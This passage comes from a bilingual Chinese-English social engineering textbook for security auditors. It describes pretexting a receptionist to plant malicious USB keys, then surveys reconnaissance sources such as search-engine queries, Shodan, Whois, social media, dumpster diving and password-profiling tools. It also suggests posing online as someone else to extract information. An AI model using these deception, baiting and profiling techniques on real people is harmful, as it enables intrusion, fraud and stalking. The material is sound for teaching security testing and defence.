我希望这个预约是可信的,我希望接待员能信任我。我说我知道他的游轮行程,这肯定意味着史密斯先生和我有过亲密的交谈——足以让我知道他的行程。但我的无助引起了同情,秘书马上就来帮我了。“哦,亲爱的,对不起,你想让我给他的助理打电话吗?”

I want the appointment to be believable and I want the receptionist to trust me by proxy. By stating I know about his cruise this must mean Mr. Smith and I have had intimate conversation—enough so that I know his itinerary. But my helplessness elicits pity and right away the secretary comes to my aid. “Oh, honey, I am sorry, do you want me to call his assistant?”

 

“啊,不。”我回答道。“我真的想给他留点信息。这样怎么样——我就把它留给你,等他回来后你再交给他?我太尴尬了;也许你可以避免告诉他我做了这件事?”

“Ah, no.” I reply. “I really wanted to leave some information with him. How about this—I will just leave it with you and you can give it to him when he gets back? I am terribly embarrassed; maybe you can avoid even telling him I did this?”

 

“我守口如瓶。”

“My lips are sealed.”

 

“谢谢。听着,我要爬出去了,不过在这之前我能用一下你的卫生间吗?”我知道我通常不会被允许进入,但我希望我的融洽关系、我的无助和他们的怜悯之心能让我成功——事实也确实如此。

“Thank you. Look I am going to crawl out of here, but before I do can I just use your bathroom?” I know that I normally would not be buzzed in, but I hope the combination of my rapport, my helplessness, and their pity will lead to success—and it does.

 

在洗手间里,我把一封信封放在一个隔间里。信封的封面上贴着一张写着“私人”的贴纸。“私人”信封里有一个 USB 密钥,上面有恶意负载。我在一个隔间里和休息室旁边的走廊里这样做,以增加我的机会,并希望找到其中一个的人足够好奇,将其插入他们的计算机。

While in the bathroom, I place an envelope in one stall. On the cover of the envelope I put a sticker that says PRIVATE. Inside the “private” envelope is a USB key with a malicious payload on it. I do this in one stall and also in the hallway by a break room to increase my chances and hope that the person that finds one of them is curious enough to insert it into their computer.

 

果然,这种方法似乎总是有效。可怕的是,如果不是咖啡店里的一次无用的小谈话,这次攻击很可能不会奏效。

Sure enough, this method seems to always work. The scary thing is that this attack probably wouldn’t work if it weren’t for a useless little conversation in a coffee shop.

 

重点不仅在于小数据如何仍会导致泄露,还在于如何收集这些数据。了解和测试可用于收集数据的来源非常重要,直到您精通每种方法和每种收集来源。收集数据的来源有很多种。优秀的社会工程师必须准备好花一些时间学习每种来源的优缺点以及利用每种来源的最佳方式。这就是下一节的主题。

The point is not only about how small data can still lead to a breach, but also how you collect this data. The sources that you can use to collect data are important to understand and test until you are proficient with each method and each source of collection. There are many different types of sources for collecting data. A good social engineer must be prepared to spend some time learning the strengths and weaknesses of each as well as the best way to utilize each source. Thus the topic of the next section.

 

信息收集来源

Sources for Information Gathering

 

收集信息的来源有很多种。以下列表不可能涵盖所有来源,但它确实概述了您拥有的主要选择。

Many different sources exist for information gathering. The following list cannot possibly cover every source out there, but it does outline the major choices you have.

 

从网站收集信息

Gathering Information from Websites

 

公司和/或个人网站可以提供大量信息。优秀的社交工程师通常要做的第一件事就是从公司或个人的网站上收集尽可能多的数据。花一些时间浏览网站可以清楚地了解:

Corporate and/or personal websites can provide a bounty of information. The first thing a good social engineer will often do is gather as much data as he can from the company’s or person’s website. Spending some quality time with the site can lead to clearly understanding:

 
 
     
  • 他们做什么
  • What they do
  •  
     
  • 他们提供的产品和服务
  • The products and services they provide
  •  
     
  • 实际位置
  • Physical locations
  •  
     
  • 职位空缺
  • Job openings
  •  
     
  • 联系电话
  • Contact numbers
  •  
     
  • 高管或董事会成员简介
  • Biographies on the executives or board of directors
  •  
     
  • 支持论坛
  • Support forum
  •  
     
  • 电子邮件命名约定
  • Email naming conventions
  •  
     
  • 有助于密码分析的特殊单词或短语
  • Special words or phrases that can help in password profiling
  •  
 

查看人们的个人网站也是一件令人惊奇的事情,因为这些网站会链接到他们生活中几乎所有私密的细节——孩子、房子、工作等等。这些信息应该被分成几部分,因为攻击中经常会用到这个列表中的内容。

Seeing people’s personal websites is also amazing because they will link to almost every intimate detail about their lives—kids, houses, jobs, and more. This information should be cataloged into sections because it will often be something from this list that is used in the attack.

 

很多时候,公司员工会加入相同的论坛、兴趣列表或社交媒体网站。如果你在 LinkedIn 或 Facebook 上找到一名员工,那么很有可能还有更多员工在那里。收集所有这些数据确实可以帮助社会工程师了解公司和员工的情况。许多员工会在社交媒体上谈论他们的职位。这可以帮助社会工程师了解一个部门可能有多少人以及部门的结构。

Many times company employees will be part of the same forums, hobby lists, or social media sites. If you find one employee on LinkedIn or Facebook, chances are that many more are there as well. Trying to gather all that data can really help a social engineer profile the company as well as the employees. Many employees will talk about their job title in their social media outlets. This can help a social engineer to profile how many people may be in a department and how the departments are structured.

 

搜索引擎

Search Engines

 

约翰尼·朗 (Johnny Long) 写了一本著名的书,名为《渗透测试人员的 Google 黑客》,真正让很多人了解到 Google 所拥有的惊人信息量。

Johnny Long wrote a famous book called Google Hacking for Penetration Testers and really opened up many people’s eyes to the amazing amount of information that Google holds.

 

Google 会原谅别人,但永远不会忘记别人,人们把它比作 Oracle。只要你知道如何提问,它几乎可以告诉你任何你想知道的事情。

Google forgives but it never forgets, and it has been compared to the Oracle. As long as you know how to ask, it can tell you most anything you want to know.

 

Johnny 开发了一个他称之为“Google Dorks”的列表,即一个字符串,可用于在 Google 中搜索以查找有关公司的信息。例如,如果您输入:site:microsoft.com filetype:pdf,您将获得microsoft.com域中所有扩展名为 PDF 的文件的列表。

Johnny developed a list of what he calls “Google Dorks,” or a string that can be used to search in Google to find out information about a company. For example if you were to type in: site:microsoft.com filetype:pdf you be given a list of every file with the extension of PDF that is on the microsoft.com domain.

 

熟悉可以帮助您找到目标文件的搜索词是信息收集的一个非常重要的部分。我习惯搜索filetype:pdffiletype:docfiletype:xlsfiletype:txt。查看员工是否真的将 DAT、CFG 或其他数据库或配置文件留在服务器上以供收集也是一个好主意。

Being familiar with search terms that can help you locate files on your target is a very important part of information gathering. I make a habit of searching for filetype:pdf, filetype:doc, filetype:xls, and filetype:txt. It is also a good idea to see if employees actually leave files like DAT, CFG, or other database or configuration files open on their servers to be harvested.

 

整本书都是专门讨论使用 Google 查找数据的主题,但要记住的主要一点是,了解 Google 的操作数将有助于您开发自己的操作数。

Entire books are dedicated to the topic of using Google to find data, but the main thing to remember is learning about Google’s operands will help you develop your own.

 

像www.googleguide.com/advanced_operators.html这样的网站有非常好的操作数列表及其使用方法。

A website like www.googleguide.com/advanced_operators.html has a very nice list of both the operands and how to use them.

 

Google 并不是唯一一个能揭露惊人信息的搜索引擎。一位名叫 John Matherly 的研究人员创建了一个名为 Shodan 的搜索引擎(www.shodanhq.com)。

Google is not the only search engine that reveals amazing information. A researcher named John Matherly created a search engine he called Shodan (www.shodanhq.com).

 

Shodan 的独特之处在于它可以在网络上搜索服务器、路由器、特定软件等。例如,搜索microsoft-iis os:“windows 2003”会显示以下数量的运行 Windows 2003 和 Microsoft IIS 的服务器:

Shodan is unique in that it searches the net for servers, routers, specific software, and so much more. For example, a search of microsoft-iis os:“windows 2003” reveals the following number of servers running Windows 2003 with Microsoft IIS:

 
 
     
  • 美国 59,140
  • United States 59,140
  •  
     
  • 中国 5,361
  • China 5,361
  •  
     
  • 加拿大 4,424
  • Canada 4,424
  •  
     
  • 英国 3,406
  • United Kingdom 3,406
  •  
     
  • 台湾 3,027
  • Taiwan 3,027
  •  
 

这次搜索并不针对特定目标,但它确实说明了一个重要的教训:网络包含着丰富的信息,需要社会工程师加以利用,才能熟练地收集信息。

This search is not target-specific, but it does demonstrate one vital lesson: the web contains an amazing wealth of information that needs to be tapped by a social engineer seeking to become proficient at information gathering.

 

Whois 侦察

Whois Reconnaissance

 

Whois 是服务和数据库的名称。Whois 数据库包含大量信息,在某些情况下甚至可能包含网站管理员的完整联系信息。

Whois is a name for a service and a database. Whois databases contain a wealth of information that in some cases can even contain full contact information of the website administrators.

 

使用 Linux 命令提示符或使用www.whois.net之类的网站可以让您获得令人惊讶的具体结果,例如某人的电子邮件地址、电话号码甚至 DNS 服务器 IP 地址。

Using a Linux command prompt or using a website like www.whois.net can lead you to surprisingly specific results like such as a person’s email address, telephone number, or even DNS server IP address.

 

Whois 信息对于分析公司和查找其服务器的详细信息非常有用。所有这些信息都可用于进一步收集信息或发起社会工程攻击。

Whois information can be very helpful in profiling a company and finding out details about their servers. All of this information can be used for further information gathering or to launch social engineering attacks.

 

公共服务器

Public Servers

 

公司的公共服务器也是其网站未透露内容的重要来源。对服务器的操作系统、已安装的应用程序和 IP 信息进行指纹识别可以揭示很多有关公司基础设施的信息。确定所使用的平台和应用程序后,您可以将这些数据与公司域名上的搜索结合起来,以查找公共支持论坛上的条目。

A company’s publicly reachable servers are also great sources for what its websites don’t say. Fingerprinting a server for its OS, installed applications, and IP information can say a great deal about a company’s infrastructure. After you determine the platform and applications in use, you could combine this data with a search on the corporate domain name to find entries on public support forums.

 

IP 地址可以告诉您服务器是本地托管还是由提供商托管;通过 DNS 记录,您可以确定服务器名称和功能以及 IP。

IP addresses may tell you whether the servers are hosted locally or with a provider; with DNS records you can determine server names and functions, as well as IPs.

 

在一次审计中,我使用名为 Maltego 的工具(第 7 章中讨论)搜索了网络,发现了一个面向公众的服务器,其中存储了数百份文档,其中包含有关项目、客户和文档创建者的关键信息。这些信息对公司来说是毁灭性的。

In one audit after searching the web using the tool called Maltego (discussed in Chapter 7), I was able to uncover a publicly facing server that housed literally hundreds of documents with key pieces of information about projects, clients, and the creators of those documents. This information was devastating to the company.

 

需要记住的一点是,执行端口扫描(使用 NMAP 或其他扫描仪等工具来定位公共服务器上使用的开放端口、软件和操作系统)可能会在某些地区导致法律问题。

An important note to keep in mind is that performing a port scan—using a tool like NMAP or another scanner to locate open ports, software, and operating systems used on a public server—can lead to problems with the law in some areas.

 

例如,2003 年 6 月,以色列人 Avi Mizrahi 被以色列警方指控企图未经授权访问计算机资料。他曾对摩萨德网站进行端口扫描。大约八个月后,他被判无罪。法官甚至裁定,如果此类行为是以积极的方式进行的,则不应受到阻止(www.law.co.il/media/computer-law/mizrachi_en.pdf)。

For example, in June 2003, an Israeli, Avi Mizrahi, was accused by the Israeli police of the offense of attempting the unauthorized access of computer material. He had port scanned the Mossad website. About eight months later, he was acquitted of all charges. The judge even ruled that these kinds of actions should not be discouraged when they are performed in a positive way (www.law.co.il/media/computer-law/mizrachi_en.pdf).

 

1999 年 12 月,斯科特·莫尔顿被联邦调查局逮捕,并被指控违反佐治亚州《计算机系统保护法》和《美国计算机欺诈和滥用法》企图侵入计算机。当时,他的 IT 服务公司与佐治亚州切罗基县签订了一项持续合同,负责维护和升级 911 中心的安全系统(www.securityfocus.com/news/126)。

In December 1999, Scott Moulton was arrested by the FBI and accused of attempted computer trespassing under Georgia’s Computer Systems Protection Act and Computer Fraud and Abuse Act of America. At the time, his IT service company had an ongoing contract with the Cherokee County of Georgia to maintain and upgrade the 911 center security (www.securityfocus.com/news/126).

 

作为工作的一部分,莫尔顿对切罗基县的服务器进行了多次端口扫描,以检查其安全性,并最终对另一家 IT 公司监控的 Web 服务器进行了端口扫描。这引发了一场诉讼,尽管他在 2000 年被宣判无罪。法官裁定没有发生任何会损害网络完整性和可用性的损害。

As part of his work, Moulton performed several port scans on Cherokee County servers to check their security and eventually port scanned a web server monitored by another IT company. This provoked a lawsuit, although he was acquitted in 2000. The judge ruled that no damage occurred that would impair the integrity and availability of the network.

 

2007 年和 2008 年,英国、法国和德国通过了法律,规定创建、分发和持有允许某人违反任何计算机法律的材料均属违法行为。端口扫描仪属于此类。

In 2007 and 2008, England, France, and Germany passed laws that make unlawful the creation, distribution, and possession of materials that allow someone to break any computer law. Port scanners fall under this description.

 

当然,如果您参与了一家公司的付费审计,其中大部分内容都会在合同中约定,但必须说明的是,社会工程审计员有责任了解当地法律,确保您没有违反这些法律。

Of course, if you are involved in a paid audit of a company most of this will be in the contract, but it is important to state that it is up to the social engineer auditor to be aware of the local laws and make sure you are not breaking them.

 

社交媒体

Social Media

 

最近,许多公司都开始使用社交媒体。这是一种廉价的营销手段,可以接触到大量潜在客户。社交媒体也是公司提供有用信息的另一个信息流。公司发布与时事相关的活动、新产品、新闻稿和故事。

Many companies have recently embraced social media. It’s cheap marketing that touches a large number of potential customers. It’s also another stream of information from a company that can provide breadcrumbs of viable information. Companies publish news on events, new products, press releases, and stories that may relate them to current events.

 

最近,社交网络开始有了自己的想法。当一个社交网络成功时,似乎会涌现出更多利用类似技术的网站。通过 Twitter、Blippy、PleaseRobMe、ICanStalkU、Facebook、LinkedIn、MySpace 等网站,您可以在广阔的空间中找到有关人们的生活和行踪的信息。稍后,本书将更深入地讨论这个主题,您将看到社交网络是令人惊叹的信息来源。

Lately, social networks have taken on a mind of their own. When one becomes successful it seems that a few more pop up that utilize similar technology. With sites like Twitter, Blippy, PleaseRobMe, ICanStalkU, Facebook, LinkedIn, MySpace, and others, you can find information about people’s lives and whereabouts in the wide open. Later, this book will discuss this topic in much more depth and you will see that social networks are amazing sources of information.

 

用户网站、博客等

User Sites, Blogs, and So On

 

博客、维基百科和在线视频等用户网站不仅可能提供有关目标公司的信息,而且还可以通过发布内容的用户提供更个性化的联系。一位不满的员工在博客中谈论公司的问题,可能会得到持有类似观点或问题的人的同情。无论哪种方式,用户总是在网络上发布大量数据供任何人查看和阅读。

User sites such as blogs, wikis, and online videos may provide not only information about the target company, but also offer a more personal connection through the user(s) posting the content. A disgruntled employee who’s blogging about his company’s problems may be susceptible to a sympathetic ear from someone with similar opinions or problems. Either way, users are always posting amazing amounts of data on the web for anyone to see and read.

 

举个例子:看看一个新出现的网站——www.icanstalku.com(见图2-4)。与其名称相反,它并不鼓励人们真正跟踪他人。这个网站指出了许多 Twitter 用户的完全不加思索。它抓取 Twitter 网站并寻找那些愚蠢到用智能手机发布照片的用户。许多人没有意识到大多数智能手机都在照片中嵌入了 GPS 位置数据。当用户将嵌入这些数据的照片发布到网上时,它可以将用户直接引导到他们的位置。

Case in point: Take a look at a new site that has popped up—www.icanstalku.com (see Figure 2-4). Contrary to its name, it does not encourage people to actually stalk others. This site points to the complete thoughtlessness of many Twitter users. It scrapes the Twitter site and looks for users who are silly enough to post pictures using their smart phones. Many people do not realize that most smart phones embed GPS location data in their photos. When a user posts a picture to the web with this data embedded it can lead a person right to their location.

 

显示位置信息是社交媒体网站的一个可怕之处。它们不仅允许您发布自己的照片,还会暗中泄露您的位置——可能您对此毫不知情。

Displaying location-based information is a scary aspect of social media websites. Not only do they allow you to post pictures of yourself, they also implicitly reveal your location—possibly without your knowledge.

 

ICanStalkU 等网站强调了这些信息的危险性。请查看一个故事(众多故事之一),了解这些数据如何被用于入室盗窃、抢劫等行为,网址为www.social-engineer.org/wiki/archives/BlogPosts/TwitterHomeRobbery.html

Sites like ICanStalkU underscore the danger of this information. Check out a story (one of many) that shows how this data is used for home break-ins, robberies, and sometimes more at www.social-engineer.org/wiki/archives/BlogPosts/TwitterHomeRobbery.html.

 

此类信息可以为您提供目标的非常详细的个人资料。人们喜欢发推文,告诉人们他们在哪里、在做什么以及和谁在一起。Blippy 允许人们连接他们的银行账户,本质上它会在每次购物时“发推文”,包括购买地点和花费。有了包含嵌入位置数据的图片,以及许多人用来放置个人照片、故事和其他相关信息的 Facebook 等网站,这是社会工程师的梦想。只需片刻,就可以开发出一份完整的个人资料,包括一个人的地址、工作、照片、爱好等。

This type of information can give you a very detailed profile of your target. People love to tweet about where they are, what they are doing, and who they are with. Blippy allows a person to connect their bank accounts and in essence it will “tweet” with each purchase, where it was from, and how much it costs. With pictures including embedded location data and then sites like Facebook, which many use to put personal pictures, stories, and other related info, it is a social engineer’s dream. In a short while a whole profile can be developed with a person’s address, job, pictures, hobbies, and more.

 

社交媒体网站的另一个特点是匿名性,这使它们成为极好的信息收集来源。如果目标是一位热爱 Facebook 页面的刚离婚的中年男子,那么您可以是一位正在寻找新朋友的年轻女性。很多时候,人们在调情时会泄露有价值的信息。在网络上,您可以扮演任何人或任何角色,再加上大多数人相信他们读到的所有内容都是真理,那么您所拥有的就是对安全的最大风险之一。

Another aspect of social media sites that makes them excellent sources of information gathering is the ability to be anonymous. If the target is a recently divorced middle-aged man who loves his Facebook page, you can be a young woman who is looking for a new friend. Many times, while flirting, people divulge valuable pieces of information. Combine the ability to be anyone or anything you want on the web with the fact that most people believe everything they read as gospel fact and what you have is one of the greatest risks to security.

 

图2-4: ICanStalkU.com主页上的典型场景。

Figure 2-4: A typical scene on the homepage of ICanStalkU.com.

 
f0204.tif
 

公开报告

Public Reports

 

公开数据可能由目标公司内部和外部的实体生成。这些数据可能包括季度报告、政府报告、分析师报告、上市公司公布的收益等。例如,邓白氏报告或其他销售报告,这些报告售价很低,但包含大量有关目标公司的详细信息。

Public data may be generated by entities inside and outside the target company. This data can consist of quarterly reports, government reports, analyst reports, earnings posted for publicly traded companies, and so on. An example of these are Dunn and Bradstreet reports or other sales reports that are sold for very little money and contain a lot of details on the target company.

 

稍后将详细讨论的另一种方法是使用背景调查工具,例如www.USSearch.comwww.intelius.com上的工具。这些网站以及许多其他网站都可以提供背景调查服务,最低收费为 1 美元(一份有限报告),最高收费为 49 美元(每月可进行任意次数的调查)。您可以使用搜索引擎免费获得大部分此类信息,但一些详细的财务数据和个人信息只能通过付费服务轻松合法地获得。也许最令人震惊的是,其中许多公司甚至可能向某些客户提供个人社会安全号码等数据。

Another avenue discussed in more detail later is using background checkers such as those found at www.USSearch.com and www.intelius.com. These sites, along with many others, can offer background check services for as little as $1 for one limited report to a $49 per month fee that lets you run as many checks as you want. You can get much of this information for free using search engines, but some of the detailed financial data and personal information can only be obtained easily and legally through a paid-for service. Perhaps most shocking is that many of these companies may even provide data like a person’s Social Security Number to some customers.

 

运用观察力

Using the Power of Observation

 

虽然作为一种社会工程工具,它使用得并不多,但简单的观察就能让你了解很多关于目标的信息。目标员工是否使用钥匙、RFID 卡或其他方法进入大楼?是否有指定的吸烟区?垃圾箱是否上锁,大楼是否有外部摄像头?电源或空调机组等外部设备通常会显示服务公司是谁,这可以让社会工程人员获得另一种访问方式。

Though not used enough as a social engineering tool, simple observation can tell you much about your target. Does the target’s employees use keys, RFID cards, or other methods to enter the building? Is there a designated area for smoking? Are dumpsters locked, and does the building have external cameras? External devices such as power supplies or air conditioning units usually reveal who the service company is, and that can allow the social engineer another vector to gain access.

 

这些只是你可以通过观察得到答案的几个问题。花些时间观察目标,使用隐蔽摄像机拍摄,然后研究和分析信息,可以让你学到很多东西,并大大提升你的信息档案。

These are just a few of the questions that you can get answers for through observation. Taking some time to watch the target, film using a covert camera, and then studying and analyzing the information later can teach you a lot and give your information file a major boost.

 

翻找垃圾

Going through the Garbage

 

是的,虽然很难想象翻找垃圾会让人感到愉快,但它却能带来最丰厚的信息收集回报。人们经常会扔掉发票、通知、信件、CD、电脑、USB 钥匙以及大量其他可以提供惊人信息量的设备和报告。如前所述,如果人们愿意扔掉价值数百万美元的艺术品,那么他们眼中视为垃圾的东西通常会毫不犹豫地直接扔进垃圾桶。

Yes, as hard as it is to imagine enjoying jumping through the trash, it can yield one of the most lucrative payoffs for information gathering. People often throw away invoices, notices, letters, CDs, computers, USB keys, and a plethora of other devices and reports that can truly give amazing amounts of information. As mentioned previously, if people are willing to throw away art that is worth millions, then things they view as trash will often go without a second thought, right into the garbage.

 

有时公司会将他们认为太重要而不能扔掉的文件粉碎,但他们使用的碎纸机效率低下,导致碎纸很容易重新拼凑在一起,如图2-5所示。

Sometimes companies shred documents they deem as too important to just throw out, but they use an inefficient shredder that leaves paper too easy to put back together, as shown in Figure 2-5.

 

图 2-5:大片单向碎片仍使一些文字可读。

Figure 2-5: Large one-way shreds leave some words still readable.

 
f0205.tif
 

这张图片显示了一些被粉碎后的文件,但一些完整的单词仍然可以辨认出来。只需一点时间和耐心以及一些胶带,就可以阻止这种粉碎,如图2-6所示。即使部分文件可以重新粘贴在一起,也可以揭示一些非常具有破坏性的信息。

This image shows a few documents after shredding, but some whole words are still discernable. This type of shredding can be thwarted with a little time and patience and some tape, as seen in Figure 2-6. Documents that can be even partially taped back together can reveal some very devastating information.

 

图 2-6:将文件重新整理在一起只需要时间和耐心。

Figure 2-6: Putting documents back together only takes time and patience.

 
f0206.tif
 

但是,使用将两个方向都撕碎成细碎碎片的碎纸机,几乎不可能将文件重新粘在一起,如图2-7所示。

However, using a shredder that shreds both directions into a fine minced mess makes taping documents back together nearly impossible, as shown in Figure 2-7.

 

图 2-7:你几乎看不出这曾经是钱。

Figure 2-7: You can hardly tell this was once money.

 
f0207.tif
 

许多公司使用商业服务将粉碎的文件带走焚烧。有些公司甚至将粉碎工作交给第三方,正如您可能猜到的那样,这让他们面临另一种攻击媒介。社会工程师如果知道供应商的名称,就可以轻松模仿收件员,并拿到所有文件。尽管如此,翻找垃圾箱可以快速找到您想要的所有信息。在翻找垃圾箱时,请记住一些关键提示:

Many companies use commercial services that take their shredded documents away for incineration. Some companies even leave the shredding to a third party, which, as you probably guessed, leaves them open to another attack vector. A social engineer who finds out the name of their vendor for this can easily mimic the pickup person and be handed all their documents. Nevertheless, dumpster diving can offer a quick way to find all the information you want. Remember some key pointers when performing a dumpster dive:

 
 
     
  • 穿一双好鞋或靴子:没有什么比跳进垃圾箱并让钉子刺穿你的脚更能毁掉你的一天了。确保你的鞋子系得好、紧,并能保护你免受尖锐物体的伤害。
  • Wear good shoes or boots: Nothing will ruin your day faster than jumping in a dumpster and having a nail go through your foot. Make sure your shoes tie on nice and tight as well as offer protection from sharp objects.
  •  
     
  • 穿深色衣服:这个不需要多解释。你可能想穿一些你不介意脱掉的衣服,以及深色衣服以避免被发现。
  • Wear dark clothing: This doesn’t need much explanation. You probably want to wear clothes you don’t mind having to get rid of, and dark clothes to avoid being detected.
  •  
     
  • 带上手电筒
  • Bring a flashlight
  •  
     
  • 抓起东西就跑:除非你处在一个非常偏僻的地方,没有被抓住的机会,否则抓起一些袋子去其他地方翻找可能是最好的选择。
  • Grab and run: Unless you are in such a secluded area that you have no chance of being caught, grabbing some bags and going elsewhere to rummage through them might be best.
  •  
 

翻找垃圾箱几乎总能找到一些非常有用的信息。有时,社会工程师甚至不必翻找垃圾箱就能找到有用的东西。第 1 章中已经提到了www.social-engineer.org/resources/book/TopSecretStolen.htm上的文章,但它巩固了这一想法。加拿大 CTU(反恐部队)计划建造一座新建筑,概述了其安全摄像头、围栏和其他绝密物品。这些蓝图被扔掉了——是的,只是扔进了垃圾桶,甚至没有被撕碎,幸运的是被一个好心人发现了。

Dumpster diving almost always leads to some very useful information. Sometimes a social engineer doesn’t even have to dive into a dumpster to find the goods. Already mentioned in Chapter 1 is the article found at www.social-engineer.org/resources/book/TopSecretStolen.htm, but it solidifies this thought. The Canadian CTU (Counter-Terrorism Unit) had plans for a new building that outlined its security cameras, fences, and other top-secret items. These blueprints were just thrown away—yes, just tossed in the trash, not even shredded, and fortunately found by a friendly person.

 

正如文章所说,这个故事只是众多表现出“极度愚蠢”的故事之一,但从社会工程师的角度来看,垃圾挖掘是最好的信息收集工具之一。

This story is just one of many that show “the height of stupidity,” as the article stated, but from a social engineer’s point of view, trash diving is one of the best information gathering tools out there.

 

使用分析软件

Using Profiling Software

 

第 7 章讨论了一些社会工程师专业工具集所包含的工具,但本节仅提供快速概述。

Chapter 7 discusses the tools that make up some of the professional toolsets of social engineers, but this section offers a quick overview.

 

通用用户密码分析器 (CUPP) 和 Who's Your Daddy (WYD) 等密码分析器可以帮助社会工程师分析公司或个人可能使用的密码。

Password profilers such as Common User Passwords Profiler (CUPP) and Who’s Your Daddy (WYD) can help a social engineer profile the potential passwords a company or person may use.

 

如何使用这些工具将在第 7 章中讨论,但像 WYD 这样的工具会抓取个人或公司的网站,并根据该网站上提到的单词创建密码列表。人们使用单词、姓名或日期作为密码的情况并不少见。这些类型的软件可以轻松创建列表以供尝试。

How to use these tools is discussed in Chapter 7, but a tool like WYD will scrape a person or company’s website and create a password list from the words mentioned on that site. It is not uncommon for people to use words, names, or dates as passwords. These types of software make it easy to create lists to try.

 

Paterva 开发的 Maltego(详情请参阅第 7 章)等神奇工具是信息收集者的梦想。Maltego 允许社会工程师执行许多基于网络的被动信息收集搜索,无需使用除 Maltego 本身之外的任何实用程序。

Amazing tools such as Maltego (see Chapter 7 for more details), made by Paterva, are an information gatherer’s dream. Maltego allows a social engineer to perform many web-based and passive information gathering searches without having to use any utilities but Maltego itself.

 

然后,它会将这些数据存储并绘制在屏幕上,用于报告、导出或其他用途。这对建立公司简介非常有帮助。

Then it will store and graph this data on the screen to be used in reporting, exporting or other purposes. This can really help in developing a profile on a company.

 

请记住,收集数据的目的是了解目标公司和公司内部人员。一旦社会工程师收集到足够的数据,他们就会在脑海中形成一幅清晰的画面,即如何最好地操纵目标数据。您需要对整个公司进行分析,并大致了解有多少员工属于某个俱乐部、业余爱好或团体。他们是否向某个慈善机构捐款,或者他们的孩子是否在同一所学校上学?所有这些信息对于建立个人资料非常有帮助。

Remember, your goal as you collect data is to learn about the target company and the people within the company. Once a social engineer collects enough data, a clear picture will form in their minds as to the best way to manipulate the data from the targets. You want to profile the company as a whole and find out roughly how many employees are part of some club, a hobby, or group. Do they donate to a certain charity or do their kids go to the same school? All of this information is very helpful in developing a profile.

 

清晰的个人资料不仅可以帮助社会工程师找到好的借口,还可以概述要使用什么问题,什么时候打电话或什么时候不宜上门,以及许多其他可以让工作变得更容易的线索。

A clear profile can help the social engineer not only in developing a good pretext, but can also outline what questions to use, what are good or bad days to call or come onsite as well as many other clues that can make the job so much easier.

 

到目前为止讨论的所有方法大多是物理的、非常个人化的信息收集方法。我没有涉及信息收集的技术方面,例如 SMTP、DNS、Netbios 和万能的 SNMP 等服务。我在第 7 章中更详细地介绍了 Maltego 可以提供帮助的一些技术方面。这些方法值得研究,但本质上非常技术化,而不是更“人性化”。

All of the methods discussed so far are mostly physical, very personal methods of information gathering. I didn’t touch on the very technical side of information gathering like services such as SMTP, DNS, Netbios, and the almighty SNMP. I do cover some of the more technical aspects that Maltego can help with in Chapter 7 in more detail. These methods are worth looking into but are very much technical in nature as opposed to more “human” in nature.

 

无论您使用何种方法来逻辑地收集信息,可能会出现的问题是,现在您知道在哪里收集、如何收集,甚至如何分类、存储和显示这些信息,您会用这些信息做什么?

Whatever the method you utilize to gather information logically, the question that may come up is now that you know where to gather, how to gather, and even how to catalog, store, and display this info, what do you do with it?

 

作为一名社会工程师,在获得信息后,您必须开始规划攻击。为此,您需要开始建模将使用此信息的大纲。开始利用这些数据的最佳方法之一是开发所谓的通信模型。

As a social engineer, after you have information you must start planning your attacks. To do that you need to start modeling an outline that will use this information. One of the best ways to start utilizing this data is to develop what is called a communication model.

 

通信建模

Communication Modeling

 

我们的沟通手段越复杂,我们交流的就越少。

The more elaborate our means of communication, the less we communicate.

 

—约瑟夫·普里斯特利

—Joseph Priestley

 

沟通是将信息从一个实体传递到另一个实体的过程。沟通需要至少两个主体之间的互动,可以理解为双向过程,即信息交换以及思想、感情或理念的进步,朝着双方都接受的目标或方向发展。

Communication is a process of transferring information from one entity to another. Communication entails interactions between at least two agents, and can be perceived as a two-way process in which there is an exchange of information and a progression of thoughts, feelings, or ideas toward a mutually accepted goal or direction.

 

这一概念与社会工程学的定义非常相似,不同之处在于,社会工程学假设参与沟通的人已经有一个共同的目标,而社会工程师的目标是通过沟通来创造一个共同的目标。沟通是一个将信息封装在一个包裹中,并通过某种媒介由发送者传递给接收者的过程。然后,接收者解码消息并向发送者提供反馈。所有形式的沟通都需要发送者、消息和接收者。了解沟通的工作原理对于开发适当的社会工程师沟通模型至关重要。以社会工程师的身份建模您的沟通将有助于我们决定最佳传递方式、最佳反馈方式和最佳信息。

This concept is very similar to the definition of social engineering, except the assumption is that those involved in the communication already have a common goal, whereas the goal of the social engineer is to use communication to create a common goal. Communication is a process whereby information is enclosed in a package and is channeled and imparted by a sender to a receiver via some medium. The receiver then decodes the message and gives the sender feedback. All forms of communication require a sender, a message, and a receiver. Understanding how communication works is essential to developing a proper communication model as a social engineer. Modeling your communication as a social engineer will help us to decide the best method of delivery, the best method for feedback, and the best message to include.

 

沟通可以采取多种形式。有听觉手段,如语音、歌曲和语调,也有非语言手段,如肢体语言、手势语言、副语言、触摸和眼神交流。

Communication can take many different forms. There are auditory means, such as speech, song, and tone of voice, and there are nonverbal means, such as body language, sign language, paralanguage, touch, and eye contact.

 

无论使用哪种类型的通信,信息及其传递方式都会对接收者产生一定的影响。

Regardless of the type of communication used, the message and how it is delivered will have a definite effect on the receiver.

 

了解基本规则对于为目标构建模型至关重要。有些规则是不能打破的,例如沟通总是有发送者和接收者。此外,每个人都有不同的个人现实,这些现实是由他们过去的经历和看法构建和影响的。

Understanding the basic ground rules is essential to building a model for a target. Some rules cannot be broken, such as communication always has a sender and a receiver. Also everyone has different personal realities that are built and affected by their past experiences and their perceptions.

 

基于这些个人现实,每个人对事物的看法、体验和解释都不同。由于这个事实,任何特定事件总会被不同的人以不同的方式看待。如果你有兄弟姐妹,一个很好的证明这一点的练习就是询问他们对某个事件的解释或记忆,尤其是当这是一个情感事件时。你会发现他们对这个事件的解释与你记忆中的非常不同。

Everyone perceives, experiences, and interprets things differently based on these personal realities. Any given event will always be perceived differently by different people because of this fact. If you have siblings, a neat exercise to prove this is to ask them their interpretation or memory of an event, especially if it is an emotional event. You will see that their interpretation of this event is very different from what you remember.

 

每个人都有物理和心理的个人空间。你允许或禁止人们进入那个空间或接近你取决于许多因素。当你以任何方式与某人交流时,你都在试图进入他们的个人空间。当社交工程师进行交流时,他们试图将其他人带入他们的空间并分享那个个人现实。有效的沟通试图将所有参与者带入彼此的心理位置。这在所有互动中都会发生,但由于它是如此普遍,人们在不加思考的情况下就这样做了。

